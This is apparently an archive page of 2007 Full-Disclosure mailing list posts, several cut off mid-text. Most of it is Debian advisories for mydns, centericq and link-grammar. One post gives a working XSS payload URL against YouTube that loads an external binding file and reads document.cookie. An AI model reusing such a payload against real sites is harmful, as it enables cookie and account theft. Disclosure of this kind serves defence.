[Full-disclosure] [SECURITY] [DSA 1434-1] New mydns packages fix denial of service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1434-1 [EMAIL PROTECTED] http://www.debian.org/security/ Thijs Kinkhorst December 16, 2007 http://www.debian.org/security/faq - Package: mydns Vulnerability : buffer overflow Problem type : remote Debian-specific: no CVE ID : CVE-2007-2362 It was discovered that in MyDNS, a domain name server with database backend, the daemon could be crashed through malicious remote update requests, which may lead to denial of service. For the stable distribution (etch), this problem has been fixed in version 1:1.1.0-7etch1. The old stable distribution (sarge) is not affected. For the unstable distribution (sid), this problem has been fixed in version 1.1.0-8. We recommend that you upgrade your mydns packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian 4.0 (stable) - --- Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/m/mydns/mydns_1.1.0-7etch1.dsc Size/MD5 checksum: 1016 6d0a22d23d6a218b2f6c36a0973fec29 http://security.debian.org/pool/updates/main/m/mydns/mydns_1.1.0-7etch1.diff.gz Size/MD5 checksum:23201 68288d6559240f652b363175077ee372 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/m/mydns/mydns-mysql_1.1.0-7etch1_alpha.deb Size/MD5 checksum: 283646 605abae7c94de5d29b3c0b2e627ba3de http://security.debian.org/pool/updates/main/m/mydns/mydns-pgsql_1.1.0-7etch1_alpha.deb Size/MD5 checksum: 276524 2ba115052634baec10286c91a5cc6ce6 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/m/mydns/mydns-mysql_1.1.0-7etch1_amd64.deb Size/MD5 checksum: 261562 fb735c256a150474a83b162823817666 http://security.debian.org/pool/updates/main/m/mydns/mydns-pgsql_1.1.0-7etch1_amd64.deb Size/MD5 checksum: 254146 57ff5991069034d7c97be430b8149aaa arm architecture (ARM) http://security.debian.org/pool/updates/main/m/mydns/mydns-mysql_1.1.0-7etch1_arm.deb Size/MD5 checksum: 244500 8361e2dfe50de8abb41d97c0bde6c8fa http://security.debian.org/pool/updates/main/m/mydns/mydns-pgsql_1.1.0-7etch1_arm.deb Size/MD5 checksum: 233926 3410cf9b02fea32800f7273b0db312c3 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/m/mydns/mydns-pgsql_1.1.0-7etch1_hppa.deb Size/MD5 checksum: 259956 dd54add61133e98ca326ffbba9d45491 http://security.debian.org/pool/updates/main/m/mydns/mydns-mysql_1.1.0-7etch1_hppa.deb Size/MD5 checksum: 267084 d457000b6afc8dcf160e06f91e5449d8 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/m/mydns/mydns-mysql_1.1.0-7etch1_i386.deb Size/MD5 checksum: 249396 a0d5f307f3eedfc6c85a587cc5572463 http://security.debian.org/pool/updates/main/m/mydns/mydns-pgsql_1.1.0-7etch1_i386.deb Size/MD5 checksum: 241112 a2ef881adaf58f206315b6843f6e0f0f ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/m/mydns/mydns-pgsql_1.1.0-7etch1_ia64.deb Size/MD5 checksum: 336738 80c0da6e223de21d5d13ee34667c17ec http://security.debian.org/pool/updates/main/m/mydns/mydns-mysql_1.1.0-7etch1_ia64.deb Size/MD5 checksum: 342716 4f95f73ebe81ae596edeae7145a55be9 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/m/mydns/mydns-pgsql_1.1.0-7etch1_mips.deb Size/MD5 checksum: 257376 e607aff2b4d31066337d10a6168831a8 http://security.debian.org/pool/updates/main/m/mydns/mydns-mysql_1.1.0-7etch1_mips.deb Size/MD5 checksum: 264792 c1f711aa974118740dd077078004a0bc mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/m/mydns/mydns-pgsql_1.1.0-7etch1_mipsel.deb Size/MD5 checksum: 257854 10b2f0d2ad613f24d9a1a316fd5c3699 http://security.debian.org/pool/updates/main/m/mydns/mydns-mysql_1.1.0-7etch1_mipsel.deb Size/MD5 checksum: 265208 ec23fa6fb9fcd9c2422ff61838b65a04 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/m/mydns/mydns-pgsql_1.1.0-7etch1_powerpc.deb Size/MD5 checksum: 257796 7e94fa5255766b49edf123c1e1546aa0 http://security.debian.org/pool/updates/main/m/mydns/mydns-mysql_1.1.0-7etch1_powerpc.deb Si
Re: [Full-disclosure] [Professional IT Security Providers - Exposed] Denim Group ( A - )
On Dec 14, 2007 4:55 PM, SecReview <[EMAIL PROTECTED]> wrote: > Peter, >Simple, they are a good company and they got a good review. > We're not in the business of bashing anyone, just in the business > of being honest. We'll leave the bashing up to the wannabe infosec > teenagers. ;) Except that you're akin to food critics that review restaurants by only reading the menu. So you're not really in the business of providing any actual insight, either. PaulM ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] XSS in YouTube.com
Hasn't worked in my tests. By the way it seems that your webspace is down.
-Ursprüngliche Nachricht-
Von: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] Im Auftrag von Michal
Majchrowicz
Gesendet: Freitag, 14. Dezember 2007 15:42
An: full-disclosure@lists.grok.org.uk
Betreff: [!! SPAM] [Full-disclosure] XSS in YouTube.com
I discovered it just while waiting for my video to download :)
http://youtube.com/results?search_query=test+'test%22%%20style=-moz-binding:
url('http://sectroyer.110mb.com/xss.xml%23xss')%20style=background:url(javas
cript:alert(document.cookie))%20test=test
Besides stealing YouTube accounts I don't think it can be used for
something serious.
Just post it here in case anyone is interested.
Regards Michal.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 1433-1] New centericq packages fix execution of code
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1433-1 [EMAIL PROTECTED] http://www.debian.org/security/ Steve Kemp December 16, 2007 http://www.debian.org/security/faq - Package: centericq Vulnerability : buffer overflow Problem type : remote Debian-specific: no CVE Id(s) : CVE-2007-3713 Several remote vulnerabilities have been discovered in centericq, a text-mode multi-protocol instant messenger client, which could allow remote attackers to execute arbitary code due to insufficient bounds-testing. For the stable distribution (etch), this problem has been fixed in version 4.21.0-18etch1. For the old stable distribution (sarge), this problem has been fixed in version 4.20.0-1sarge5. We recommend that you upgrade your centericq package. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge5.dsc Size/MD5 checksum: 875 0e3de98bb55d5af241acbb7c42c47cd0 http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge5.diff.gz Size/MD5 checksum: 117817 a0d486891cbf0dbafd36acda7d329e7a http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0.orig.tar.gz Size/MD5 checksum: 1796894 874165f4fbd40e3be677bdd1696cee9d alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge5_alpha.deb Size/MD5 checksum: 1651664 69022dfe5342b1056abca9c9b433532d http://security.debian.org/pool/updates/main/c/centericq/centericq-common_4.20.0-1sarge5_alpha.deb Size/MD5 checksum: 337338 b408f37c75ebff4cca8e0fd9bae2a2e2 http://security.debian.org/pool/updates/main/c/centericq/centericq-fribidi_4.20.0-1sarge5_alpha.deb Size/MD5 checksum: 1652642 b1e027154c70c15250c131bcd1584c30 http://security.debian.org/pool/updates/main/c/centericq/centericq-utf8_4.20.0-1sarge5_alpha.deb Size/MD5 checksum: 1651712 1fc9e5fbf1d193d8d6ec6c2fa9cf28bf amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/c/centericq/centericq-common_4.20.0-1sarge5_amd64.deb Size/MD5 checksum: 335496 e89f821a32c11d314b397ee454da5094 http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge5_amd64.deb Size/MD5 checksum: 1355704 f3371f5f48e1057f1fb80714c0ea98bc http://security.debian.org/pool/updates/main/c/centericq/centericq-fribidi_4.20.0-1sarge5_amd64.deb Size/MD5 checksum: 1355942 dbaa8f53bcddceb3828e3b8b857bf833 http://security.debian.org/pool/updates/main/c/centericq/centericq-utf8_4.20.0-1sarge5_amd64.deb Size/MD5 checksum: 1355764 2752c6ff95628f99693521617bc32d73 arm architecture (ARM) http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge5_arm.deb Size/MD5 checksum: 2184304 34cd68e7c3f0374c40e545a61446f48c http://security.debian.org/pool/updates/main/c/centericq/centericq-fribidi_4.20.0-1sarge5_arm.deb Size/MD5 checksum: 2185094 7cbfa8db84b905a267ddf518415a7553 http://security.debian.org/pool/updates/main/c/centericq/centericq-common_4.20.0-1sarge5_arm.deb Size/MD5 checksum: 336124 19e8fc68148e1ebc8dc6a51c2c488689 http://security.debian.org/pool/updates/main/c/centericq/centericq-utf8_4.20.0-1sarge5_arm.deb Size/MD5 checksum: 2184366 b5ac5dffa73e7273a3e03b91e4413be0 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/c/centericq/centericq_4.20.0-1sarge5_hppa.deb Size/MD5 checksum: 1812692 c21a00400546a5fbf571cf517bd34657 http://security.debian.org/pool/updates/main/c/centericq/centericq-fribidi_4.20.0-1sarge5_hppa.deb Size/MD5 checksum: 1813624 f48400ea56e3027d2e828b3353442131 http://security.debian.org/pool/updates/main/c/centericq/centericq-common_4.20.0-1sarge5_hppa.deb Size/MD5 checksum: 336228 035a6af70173afb011a9a77631bdab3b http://security.debian.org/pool/updates/main/c/centericq/centericq-utf8_4.20.0-1sarge5_hppa.deb Size/MD5 checksum: 1812750 10f3220cf0a0334113b4eb6b03e7f63c i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/c/centericq/centericq-utf8_4.20.0-1sarge5_i386.deb Size/MD5 checksum: 1350010 fbf767b42da3ffc738073577afea697a http://securi
[Full-disclosure] Round up of messages by n3td3v for winter season 2007
Dr Neal Krawetz in sophisticated smear campaign against n3td3v http://groups.google.co.uk/group/n3td3v/browse_thread/thread/21570dcea28bc218 UK government should better regulate hacking courses says n3td3v http://groups.google.co.uk/group/n3td3v/browse_thread/thread/177891d63c0a7d24/ Why n3td3v thinks Morning_Wood should be banned from UK http://groups.google.co.uk/group/n3td3v/browse_thread/thread/df79524c8b9fbb4b/ Why HM Customs & Revenue data CDs could of been found by now says n3td3v http://groups.google.co.uk/group/n3td3v/browse_thread/thread/151928a62e8f086c MI5 and the british government contradict each other says n3td3v http://groups.google.co.uk/group/n3td3v/browse_thread/thread/56d01439b93368b5 Why n3td3v thinks Jonathan Evans is bad for MI5 http://groups.google.co.uk/group/n3td3v/browse_thread/thread/3d20a69107d9914a Internet eBay & Paypal Fraud -A complaint to our Governments by a reader of n3td3v http://groups.google.co.uk/group/n3td3v/browse_thread/thread/60fca47edc49458a/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] BackTrack3 beta
I took the beta of BackTrack3 (http://www.offensive-security.com/bt3b141207.rar.torrent) for a spin last night and was very impressed. I have not looked into the anonymizing features, or if there are any stego tools in it (a man has to sleep sometime) but given the design those ought to be simple customizations. Did not check it for i18n configuration either, such as right-to-left language support, etc. Let's not leave our jihadi friends out, after all! It would appear to be a near perfect tool for the sorts of mischievous ideas one might think up. A lovely bit of work. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 1432-1] New link-grammar packages fix execution of code
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1432-1 [EMAIL PROTECTED] http://www.debian.org/security/ Steve Kemp December 16, 2007 http://www.debian.org/security/faq - Package: link-grammar Vulnerability : buffer overflow Problem type : local Debian-specific: no CVE Id(s) : CVE-2007-5395 Debian Bug : 450695 Alin Rad Pop discovered that link-grammar, Carnegie Mellon University's link grammar parser for English, performed insufficient validation within its tokenizer, which could allow a malicious input file to execute arbitrary code. For the stable distribution (etch), this problem has been fixed in version 4.2.2-4etch1. For the old stable distribution (sarge), this package was not present. For the unstable distribution (sid), this problem was fixed in version 4.2.5-1. We recommend that you upgrade your link-grammar package. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Source archives: http://security.debian.org/pool/updates/main/l/link-grammar/link-grammar_4.2.2.orig.tar.gz Size/MD5 checksum: 742163 798c165b7d7f26e60925c30515c45782 http://security.debian.org/pool/updates/main/l/link-grammar/link-grammar_4.2.2-4etch1.dsc Size/MD5 checksum: 669 535a962c3aefbf92b3d09bd9355d3b57 http://security.debian.org/pool/updates/main/l/link-grammar/link-grammar_4.2.2-4etch1.diff.gz Size/MD5 checksum: 8231 fa03dfbb7a2e0a47130c9f1385eb48d3 Architecture independent packages: http://security.debian.org/pool/updates/main/l/link-grammar/link-grammar-dictionaries-en_4.2.2-4etch1_all.deb Size/MD5 checksum: 267530 52ef5d6278b5f8a5a0c0894b3d99235e alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/l/link-grammar/liblink-grammar4-dev_4.2.2-4etch1_alpha.deb Size/MD5 checksum: 169386 f866bf37b179cf8f1c31f13b0ab9100a http://security.debian.org/pool/updates/main/l/link-grammar/link-grammar_4.2.2-4etch1_alpha.deb Size/MD5 checksum:1 14b288d946738d5eefed5dc50e84040f http://security.debian.org/pool/updates/main/l/link-grammar/liblink-grammar4_4.2.2-4etch1_alpha.deb Size/MD5 checksum: 108456 826d5896c36850255bedfcc3b70a8ea1 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/l/link-grammar/link-grammar_4.2.2-4etch1_amd64.deb Size/MD5 checksum:16038 ea80489f9db4f247d5009bf435f40707 http://security.debian.org/pool/updates/main/l/link-grammar/liblink-grammar4_4.2.2-4etch1_amd64.deb Size/MD5 checksum:95996 0851ea02bd3b4b600d68df09016915cf http://security.debian.org/pool/updates/main/l/link-grammar/liblink-grammar4-dev_4.2.2-4etch1_amd64.deb Size/MD5 checksum: 127934 a43908000f552820cdcd2c1a7819f62f arm architecture (ARM) http://security.debian.org/pool/updates/main/l/link-grammar/link-grammar_4.2.2-4etch1_arm.deb Size/MD5 checksum:15074 5a881ae17e13efc9ae731b9f86d7a0ff http://security.debian.org/pool/updates/main/l/link-grammar/liblink-grammar4-dev_4.2.2-4etch1_arm.deb Size/MD5 checksum: 110896 54d4534ce7a06ed675d9c4d2c957e519 http://security.debian.org/pool/updates/main/l/link-grammar/liblink-grammar4_4.2.2-4etch1_arm.deb Size/MD5 checksum:87732 5dfce7e3245ab16bbab0f2325d462192 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/l/link-grammar/link-grammar_4.2.2-4etch1_hppa.deb Size/MD5 checksum:16202 3f8cbe2ab057f5d3b387c1e52e4e9e51 http://security.debian.org/pool/updates/main/l/link-grammar/liblink-grammar4-dev_4.2.2-4etch1_hppa.deb Size/MD5 checksum: 139488 2411aae738f8467e4180debc87b265ee http://security.debian.org/pool/updates/main/l/link-grammar/liblink-grammar4_4.2.2-4etch1_hppa.deb Size/MD5 checksum: 104292 105899d1fa1a37a2690a6d3372572912 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/l/link-grammar/link-grammar_4.2.2-4etch1_i386.deb Size/MD5 checksum:15458 9b43845e6fdb26319c4dd3d88afe5fb4 http://security.debian.org/pool/updates/main/l/link-grammar/liblink-grammar4_4.2.2-4etch1_i386.deb Size/MD5 checksum:89456 ffa178b41a336d1a9e11bca02a3d2232 http://security.debian.org/pool/updates/main/l/link-grammar/liblink-grammar4-dev_4.2.2-4etch1_i386.deb Size/MD5 checksum: 111356 50b911abcf
